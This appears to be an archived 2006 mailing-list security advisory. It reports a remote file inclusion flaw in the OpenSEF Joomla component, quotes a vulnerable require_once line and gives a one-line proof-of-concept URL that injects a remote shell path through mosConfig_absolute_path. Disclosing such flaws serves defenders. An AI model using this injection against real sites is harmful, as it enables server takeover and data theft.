Modification For OpenSEF Remote file Inclusion

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Modification For OpenSEF Remote file Inclusion

Subject: Modification For OpenSEF Remote file Inclusion
Date: 19 Aug 2006 01:18:24 -0000
From: suppressed

		###########################################################################################
		#			Aria-Security.net Advisory                                        #
		#			Discovered  by: O.U.T.L.A.W                                       #			#			< www.Aria-security.net >                                      	  #
		#		Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                      	  #
		#		                                  		    			  #
		###########################################################################################


#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly) 
#Source:
   
 require_once( $mosConfig_absolute_path . '/includes/sef.php' );
  } else {
    // Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
    //


************************************************************************************

 											  
#Proof of Concept:								   	  
#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL
#							  
#----------------------------------------------------------                               
#               									  										  
#										                  
#Contact : suppressed

Prev by Date: Re: JavaScript Lazy Authorization Forcer and Visited Link Scaner
Next by Date: Ako Comments (mod) Remote File Inclusion
Previous by thread: Sonium Enterprise Adressbook Version 0.2 (folder) RFI
Next by thread: Ako Comments (mod) Remote File Inclusion
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.